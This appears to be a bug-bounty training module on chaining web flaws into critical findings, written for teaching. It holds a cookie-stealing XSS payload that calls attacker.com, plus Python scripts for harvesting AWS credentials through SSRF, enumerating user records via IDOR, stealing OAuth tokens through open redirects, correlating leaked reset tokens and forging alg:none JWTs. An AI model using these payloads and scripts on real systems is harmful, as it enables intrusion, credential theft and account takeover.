API & Mobile Security
Chaining Vulnerabilities for Maximum Impact
Individual low-severity bugs can combine into critical findings. Vulnerability chaining is what separates good hunters from great ones.
Why Chain Vulnerabilities?
| Single Bug | Chained Bugs |
|---|---|
| Low-Medium severity | Critical severity |
| $100-$500 bounty | $5,000-$50,000+ bounty |
| "Informational" | "Full compromise" |
| Often dismissed | Always prioritized |
Common Chains
XSS → Account Takeover
1. Find stored XSS in a user profile field
2. Inject a payload that exfiltrates the session cookie
3. Victim views the profile, session exfiltrated
4. Attacker replays the stolen session in their own browser
5. Full account takeover achieved
Caveat: if the session cookie is HttpOnly, document.cookie is empty and this exact payload yields nothing. The chain still works, but the payload has to act inside the victim's browser instead (change the account email, add an API key, read the anti-CSRF token and submit the form), which is the XSS + CSRF variant written up later in this module.
Payload:
```html
<script>
// Exfiltrate the victim's cookies to an attacker-controlled host; encoding keeps
// the whole cookie string inside one query parameter
fetch('https://attacker.com/steal?c=' + encodeURIComponent(document.cookie))
</script>
```
SSRF → Cloud Metadata → AWS Takeover
1. Find SSRF in a URL-fetch feature (webhooks, image import, PDF rendering)
2. Request http://169.254.169.254/latest/meta-data/ through it
3. Read /latest/meta-data/iam/security-credentials/ to list the instance role, then request the role name to get its temporary keys (AccessKeyId, SecretAccessKey, Token)
4. Export them as AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN and confirm with `aws sts get-caller-identity`
5. Everything the role can reach is now yours: S3 buckets, EC2 instances, whatever the policy allows
Caveat: an instance that enforces IMDSv2 answers every plain GET with 401; the token has to be obtained with a PUT to /latest/api/token and sent in a header, which a GET-only SSRF cannot do.
Impact escalation:
- SSRF alone: Medium
- With metadata: High
- With credential access: Critical
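As an added example (not code from the original page), the following Python walks the IMDS credential path through a hypothetical SSRF primitive `fetch(url) -> (status, body)`. The metadata responses are constructed stand-ins and the credentials are fake; the `imdsv2_only_fetch` stub shows what the same chain does against a host that enforces IMDSv2.

```python
import json
from typing import Callable, Dict, Optional, Tuple

# Hypothetical SSRF primitive: the vulnerable server fetches `url` for us and we
# get back (status, body). In practice this wraps the vulnerable parameter, e.g.
# a requests.get() against the URL-fetch feature that returns the proxied body.
Fetcher = Callable[[str], Tuple[int, str]]

IMDS = "http://169.254.169.254"
CREDS_PATH = IMDS + "/latest/meta-data/iam/security-credentials/"


def harvest_iam_credentials(fetch: Fetcher) -> Dict[str, Optional[dict]]:
    """Walk the IMDS credential tree through the SSRF and return role -> creds.

    Returns {} when nothing answers, maps a role to None when its document is
    unusable, and raises when the host enforces IMDSv2 (GET without a session
    token is rejected with 401, so a GET-only SSRF cannot continue the chain).
    """
    status, body = fetch(CREDS_PATH)
    if status == 401:
        raise PermissionError("IMDSv2 enforced: need PUT /latest/api/token plus a header")
    if status != 200 or not body.strip():
        return {}
    creds: Dict[str, Optional[dict]] = {}
    for role in body.split():  # one role name per line
        role_status, role_body = fetch(CREDS_PATH + role)
        if role_status != 200:
            creds[role] = None
            continue
        try:
            doc = json.loads(role_body)
            creds[role] = {k: doc[k] for k in ("AccessKeyId", "SecretAccessKey", "Token", "Expiration")}
        except (ValueError, KeyError):
            creds[role] = None
    return creds


def aws_env_exports(creds: dict) -> str:
    """Render harvested keys as shell exports for the AWS CLI."""
    return "\n".join([
        f"export AWS_ACCESS_KEY_ID={creds['AccessKeyId']}",
        f"export AWS_SECRET_ACCESS_KEY={creds['SecretAccessKey']}",
        f"export AWS_SESSION_TOKEN={creds['Token']}",
    ])


# Constructed IMDSv1 responses standing in for the target; not real credentials.
FAKE_IMDS = {
    CREDS_PATH: (200, "app-role\n"),
    CREDS_PATH + "app-role": (200, json.dumps({
        "Code": "Success",
        "Type": "AWS-HMAC",
        "AccessKeyId": "ASIAEXAMPLE123456789",
        "SecretAccessKey": "exampleSecretKeyNotReal",
        "Token": "exampleSessionTokenNotReal",
        "Expiration": "2030-01-01T00:00:00Z",
    })),
}


def fake_ssrf_fetch(url: str) -> Tuple[int, str]:
    """Constructed SSRF against an IMDSv1 host."""
    return FAKE_IMDS.get(url, (404, ""))


def imdsv2_only_fetch(url: str) -> Tuple[int, str]:
    """Constructed SSRF against a host with IMDSv2 required: every GET is 401."""
    return (401, "")


if __name__ == "__main__":
    for role, c in harvest_iam_credentials(fake_ssrf_fetch).items():
        print(f"[+] role {role}")
        print(aws_env_exports(c))
```

Swap `fake_ssrf_fetch` for a wrapper around the real vulnerable parameter and nothing else changes. A 401 on the very first request ends this branch of the chain unless the SSRF can issue a PUT with a custom header, which is worth stating explicitly in the report.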
IDOR → Mass Data Exposure
1. Find an IDOR that returns a single record belonging to another user
2. Enumerate sequential or guessable IDs to dump records at scale
3. Look for a bulk path that shortcuts the enumeration: a pagination parameter that accepts an oversized limit, an export endpoint, or an injectable filter (SQLi)
4. Extract the entire table
5. PII of all users exposed
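An added example of steps 1 and 2 (not code from the original page) against a constructed `/api/users/<id>` handler: prove the IDOR with one foreign record, then walk sequential ids with a bounded gap so the enumeration stops by itself. The fixed handler shows what the same script returns once an ownership check is in place. The path, record fields and ids are hypothetical.

```python
import re
from typing import Callable, Dict, Tuple

# Hypothetical primitive: GET `path` with the attacker's own session -> (status, json)
Fetch = Callable[[str], Tuple[int, dict]]

# Constructed records behind /api/users/<id>; id 1 is the attacker. Not real data.
FAKE_USERS = {
    1: {"id": 1, "email": "attacker@example.test", "phone": "+1-555-0100"},
    2: {"id": 2, "email": "alice@example.test", "phone": "+1-555-0101"},
    3: {"id": 3, "email": "bob@example.test", "phone": "+1-555-0102"},
    7: {"id": 7, "email": "admin@example.test", "phone": "+1-555-0107"},
}
ATTACKER_ID = 1
USER_PATH = re.compile(r"/api/users/(\d+)")


def api_idor(path: str) -> Tuple[int, dict]:
    """Vulnerable handler: any authenticated session can read any id."""
    m = USER_PATH.fullmatch(path)
    rec = FAKE_USERS.get(int(m.group(1))) if m else None
    return (200, rec) if rec else (404, {})


def api_fixed(path: str) -> Tuple[int, dict]:
    """Fixed handler: the record must belong to the calling session."""
    status, rec = api_idor(path)
    if status == 200 and rec["id"] != ATTACKER_ID:
        return (403, {})
    return status, rec


def confirm_idor(fetch: Fetch, own_id: int, other_id: int) -> bool:
    """Step 1: one record that is not ours is enough to prove the bug."""
    status, rec = fetch(f"/api/users/{other_id}")
    return status == 200 and rec.get("id") == other_id != own_id


def enumerate_records(fetch: Fetch, start: int = 1, max_ids: int = 1000,
                      max_gap: int = 5) -> Dict[int, dict]:
    """Step 2: walk sequential ids, stopping after `max_gap` consecutive misses.

    Keep max_ids inside what the program permits: a sample of foreign records
    proves mass exposure, the whole table does not need to be pulled.
    """
    found: Dict[int, dict] = {}
    gap = 0
    for i in range(start, start + max_ids):
        status, rec = fetch(f"/api/users/{i}")
        if status == 200:
            found[i] = rec
            gap = 0
        else:
            gap += 1
            if gap >= max_gap:
                break
    return found


def exposed_pii(records: Dict[int, dict], own_id: int) -> Dict[str, int]:
    """Count which PII fields leak from accounts other than the attacker's own."""
    counts: Dict[str, int] = {}
    for i, rec in records.items():
        if i == own_id:
            continue
        for field in ("email", "phone"):
            if rec.get(field):
                counts[field] = counts.get(field, 0) + 1
    return counts


if __name__ == "__main__":
    if confirm_idor(api_idor, ATTACKER_ID, 2):
        dump = enumerate_records(api_idor, start=1, max_ids=50)
        print(f"{len(dump)} records, leaked fields: {exposed_pii(dump, ATTACKER_ID)}")
```

The gap heuristic is what keeps the script polite: ids 4 to 6 are missing in the sample, the walk survives that hole because the gap resets at id 7, and it gives up after five consecutive misses past it. Against the fixed handler the same walk returns only the attacker's own record.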
Open Redirect → OAuth Token Theft
1. Find an open redirect on the OAuth client's own domain: /redirect?url=evil.com
2. Build an authorization URL whose redirect_uri points at it, URL-encoded: redirect_uri=https://app/redirect?url=https://evil.com. This passes whenever the authorization server validates redirect_uri by origin or prefix instead of exact match.
3. Victim follows the link and authorizes the app
4. The authorization server redirects to the open redirector with the token in the URL fragment (implicit flow) or the code in the query; the redirector bounces the browser to evil.com, and the browser carries the fragment along because the Location header has none of its own
5. Attacker reads the token from their server and gains account access
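The redirect_uri check that makes step 2 possible, side by side with the exact-match fix, plus a browser-style redirect follower that shows why the fragment reaches the attacker's sink. This is an added example, not code from the page; `app.example`, `/redirect`, `evil.example` and `auth.example` are hypothetical names.

```python
from typing import Callable, Optional
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Hypothetical OAuth client, its registered callback, its open redirector and an
# attacker-controlled sink. None of these names come from the original page.
CLIENT_ORIGIN = "https://app.example"
REGISTERED_REDIRECT = CLIENT_ORIGIN + "/callback"
OPEN_REDIRECTOR = CLIENT_ORIGIN + "/redirect"   # 302s to ?url= without any check
ATTACKER_SINK = "https://evil.example/sink"


def allowed_weak(redirect_uri: str) -> bool:
    """Vulnerable: origin/prefix matching admits any path on the trusted origin."""
    return redirect_uri.startswith(CLIENT_ORIGIN + "/")


def allowed_strict(redirect_uri: str) -> bool:
    """Fixed: exact string comparison against the registered URI."""
    return redirect_uri == REGISTERED_REDIRECT


def redirector_link(sink: str) -> str:
    return OPEN_REDIRECTOR + "?" + urlencode({"url": sink})


def build_attack_url(authz_server: str, client_id: str, sink: str) -> str:
    """Authorization URL whose redirect_uri is the open redirector (double-encoded)."""
    return authz_server + "/authorize?" + urlencode({
        "response_type": "token",   # implicit flow: token is returned in the fragment
        "client_id": client_id,
        "redirect_uri": redirector_link(sink),
        "scope": "read",
    })


def redirect_uri_of(attack_url: str) -> str:
    """What the authorization server sees after decoding the query."""
    return parse_qs(urlsplit(attack_url).query)["redirect_uri"][0]


def open_redirector_server(url_no_fragment: str) -> Optional[str]:
    """Constructed behaviour of /redirect: answer 302 to whatever ?url= says."""
    parts = urlsplit(url_no_fragment)
    if parts.scheme + "://" + parts.netloc + parts.path != OPEN_REDIRECTOR:
        return None   # any other host just serves the page; no redirect
    targets = parse_qs(parts.query).get("url")
    return targets[0] if targets else None


def browser_follow(url: str, server: Callable[[str], Optional[str]]) -> str:
    """Follow 302s like a browser: the fragment is never sent to the server and is
    carried over to the next URL when the Location header has no fragment."""
    for _ in range(10):
        parts = urlsplit(url)
        location = server(urlunsplit(parts._replace(fragment="")))
        if location is None:
            return url
        nxt = urlsplit(location)
        url = urlunsplit(nxt._replace(fragment=nxt.fragment or parts.fragment))
    raise RuntimeError("too many redirects")


def simulate_implicit_flow(attack_url: str, validator: Callable[[str], bool],
                           issued_token: str) -> Optional[str]:
    """Where the victim's browser ends up after authorizing; None if rejected."""
    redirect_uri = redirect_uri_of(attack_url)
    if not validator(redirect_uri):
        return None
    landing = redirect_uri + "#" + urlencode({"access_token": issued_token,
                                              "token_type": "bearer"})
    return browser_follow(landing, open_redirector_server)


def token_from_url(url: str) -> Optional[str]:
    """What the attacker's sink reads back from location.hash."""
    return parse_qs(urlsplit(url).fragment).get("access_token", [None])[0]


if __name__ == "__main__":
    attack = build_attack_url("https://auth.example", "client123", ATTACKER_SINK)
    print("weak  :", simulate_implicit_flow(attack, allowed_weak, "tok123"))
    print("strict:", simulate_implicit_flow(attack, allowed_strict, "tok123"))
```

With the code flow the same redirector leaks `?code=` in the query instead; that is still an account takeover when the client has no secret and PKCE is not enforced, so the fix is the same: exact redirect_uri matching, and no open redirectors on the client origin.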
Information Disclosure → Login Bypass
1. Find an exposed debug endpoint that lists user emails and roles
2. Find password reset tokens leaked in an exposed log (reset links logged by the mailer)
3. Correlate email → latest token
4. Use the admin's reset link to set a new password
5. Admin account compromised
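The email → token correlation of steps 1 to 3, as an added Python example that is not from the original page. The `/debug` user list and the log lines are constructed samples with the shape described above; the log format and the `reset?token=` link are assumptions.

```python
import re
from typing import Dict, List, Optional

# Constructed samples standing in for a leaky /debug endpoint and an exposed log.
DEBUG_USERS = [
    {"id": 1, "email": "alice@example.test", "role": "user"},
    {"id": 2, "email": "admin@example.test", "role": "admin"},
    {"id": 3, "email": "bob@example.test", "role": "user"},
]
LOG_SAMPLE = """\
2024-05-01T10:00:01Z INFO  mailer: reset sent to alice@example.test url=https://app.example/reset?token=3f9a1c2e5d7b8a40
2024-05-01T10:00:02Z INFO  mailer: reset sent to admin@example.test url=https://app.example/reset?token=7c1b9e0d2f4a6b81
2024-05-01T10:00:03Z INFO  auth: login ok user=bob@example.test
2024-05-01T10:04:09Z INFO  mailer: reset sent to alice@example.test url=https://app.example/reset?token=aa00bb11cc22dd33
"""

# Assumed log line shape; adjust the pattern to whatever the real logger writes.
RESET_LINE = re.compile(
    r"reset sent to (?P<email>\S+) url=(?P<url>https?://\S+?token=(?P<token>[0-9a-f]+))"
)


def extract_reset_links(log_text: str) -> Dict[str, str]:
    """email -> most recent reset URL; a newer request usually invalidates the old token."""
    links: Dict[str, str] = {}
    for line in log_text.splitlines():
        m = RESET_LINE.search(line)
        if m:
            links[m.group("email")] = m.group("url")
    return links


def correlate(users: List[dict], links: Dict[str, str]) -> List[dict]:
    """Join the leaked user list with the leaked links; only users with a link are actionable."""
    return [dict(u, reset_url=links[u["email"]]) for u in users if u["email"] in links]


def best_target(hits: List[dict]) -> Optional[dict]:
    """Prefer an admin: that is what turns a token leak into an admin compromise."""
    return next((h for h in hits if h["role"] == "admin"), hits[0] if hits else None)


if __name__ == "__main__":
    target = best_target(correlate(DEBUG_USERS, extract_reset_links(LOG_SAMPLE)))
    print(target)
```

Keeping only the latest link per address matters: Alice's first token was superseded four minutes later, and a report built on a stale link will not reproduce for triage.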
Complex Chain Example
Full Attack Chain: $100 Bug → $50,000 Critical
Step 1: Low-severity info disclosure
- Exposed /debug endpoint reveals an internal IP
Step 2: SSRF via PDF generation
- /generate-pdf?url= fetches and renders whatever URL it is given, internal ones included
- Probe the disclosed IP and its neighbours through it; the rendered page or the error tells you what answered
Step 3: Internal Jenkins found
- Jenkins on the internal IP has no authentication
- Its script console runs Groovy as the Jenkins user, which means arbitrary commands on the build host
Step 4: Credential access
- The Jenkins environment and job configuration hold AWS credentials
- Database connection strings are exposed in build logs and config
Step 5: Full compromise
- AWS access → S3 buckets → customer data
- Database access → full data dump
Chaining Methodology
Step 1: Inventory All Findings
| ID | Bug | Severity | Notes |
|----|-----|----------|-------|
| 1 | Open redirect | Low | Login flow |
| 2 | SSRF (blind) | Medium | PDF generator |
| 3 | Info disclosure | Info | Version numbers |
| 4 | Weak JWT | Medium | No signature check |
Step 2: Map Potential Connections
Open redirect → OAuth flow?
SSRF → Internal services?
Info disclosure → Version → Known CVE?
Weak JWT → Token forging → Admin access?
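The "Weak JWT → token forging → admin access" branch worked through in Python, as an added example that is not part of the original page. It mints a legitimate HS256 token, forges an `alg: none` token for the same subject with `role: admin`, and runs both through a verifier that trusts the header's `alg` and one that pins it. The signing key is a constructed demo value.

```python
import base64
import hashlib
import hmac
import json
from typing import Callable

# Hypothetical server-side HMAC key, constructed for this example only.
SERVER_KEY = b"server-side-hmac-key-for-demo-only"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _encode_json(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def _hs256(signing_input: str) -> bytes:
    return hmac.new(SERVER_KEY, signing_input.encode(), hashlib.sha256).digest()


def issue_token(claims: dict) -> str:
    """What the server legitimately mints: HS256 over header.payload."""
    header, payload = _encode_json({"alg": "HS256", "typ": "JWT"}), _encode_json(claims)
    signing_input = f"{header}.{payload}"
    return f"{signing_input}.{_b64url(_hs256(signing_input))}"


def forge_alg_none(claims: dict) -> str:
    """Attacker side: header claims alg=none, signature part left empty."""
    return f"{_encode_json({'alg': 'none', 'typ': 'JWT'})}.{_encode_json(claims)}."


def swap_payload(token: str, claims: dict) -> str:
    """Attacker side: keep header and signature, replace the claims (should fail everywhere)."""
    header, _, sig = token.split(".")
    return f"{header}.{_encode_json(claims)}.{sig}"


def verify_vulnerable(token: str) -> dict:
    """Trusts the alg named in the header: 'none' skips the signature check entirely."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") == "HS256":
        if not hmac.compare_digest(_hs256(f"{header_b64}.{payload_b64}"), _b64url_decode(sig_b64)):
            raise ValueError("bad signature")
    elif header.get("alg") != "none":
        raise ValueError("unsupported alg")
    return json.loads(_b64url_decode(payload_b64))


def verify_strict(token: str) -> dict:
    """Pins the algorithm the server issues and always checks the signature."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("alg must be HS256")
    if not hmac.compare_digest(_hs256(f"{header_b64}.{payload_b64}"), _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(payload_b64))


def is_admin(verify: Callable[[str], dict], token: str) -> bool:
    """What an authorization check looks like on top of either verifier."""
    try:
        return verify(token).get("role") == "admin"
    except ValueError:
        return False


if __name__ == "__main__":
    forged = forge_alg_none({"sub": "42", "role": "admin"})
    print("vulnerable verifier grants admin:", is_admin(verify_vulnerable, forged))
    print("strict verifier grants admin:   ", is_admin(verify_strict, forged))
```

The vulnerable verifier is not skipping signatures altogether (a tampered HS256 token is still rejected); the bug is that the token chooses its own algorithm. When testing, send the `alg: none` token exactly as shown, including the trailing dot, and try the capitalisation variants `None` and `NONE` as well, since some libraries compare case-insensitively.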
Step 3: Test Combinations
- Can bug A enable bug B?
- Can bug B's output feed into bug C?
- What's the worst-case scenario if all succeed?
Step 4: Document the Chain
```markdown
## Vulnerability Chain: Account Takeover via XSS + CSRF
### Individual Bugs
1. Stored XSS in profile bio (Medium)
2. No CSRF protection on email change (Medium)
### Attack Chain
1. Attacker injects XSS payload in their profile
2. Payload executes when victim views profile
3. XSS triggers email change to attacker's email
4. Password reset sent to attacker
5. Full account takeover
### Impact: Critical
- Any user viewing attacker's profile loses their account
```
Note that the missing CSRF token only lowers the bar here: script running on the origin can read an anti-CSRF token out of the page and submit it, so the XSS alone would usually carry the chain. Report both anyway, because each is fixed independently and the CSRF gap is exploitable from other origins without any XSS.
Impact Multiplication Table
| Bug 1 | + Bug 2 | = Impact |
|---|---|---|
| SSRF | Internal access | Critical |
| XSS | Session theft | High→Critical |
| SQLi | Admin table access | Critical |
| IDOR | Mass enumeration | High |
| Info leak | Credential exposure | Critical |
| Open redirect | OAuth | High |
Bounty Examples
| Company | Chain | Bounty |
|---|---|---|
| Uber | SSRF → AWS → Data | $25,000 |
| Shopify | XSS → CSRF → ATO | $15,000 |
| PayPal | IDOR → Mass leak | $12,000 |
| GitLab | Info → SQLi → RCE | $35,000 |
Pro Tips
- Never discard low-severity bugs: They're chain starters
- Map application flow: Understand how data moves
- Think like an attacker: What's the worst you could do?
- Document everything: Chains need clear narratives
- Communicate impact: Help triage understand severity
Pro Tip: The best chains are told as stories. "Attacker does X, which enables Y, leading to Z compromise." Make the path to impact crystal clear.
Next module: Professional reporting and building your career.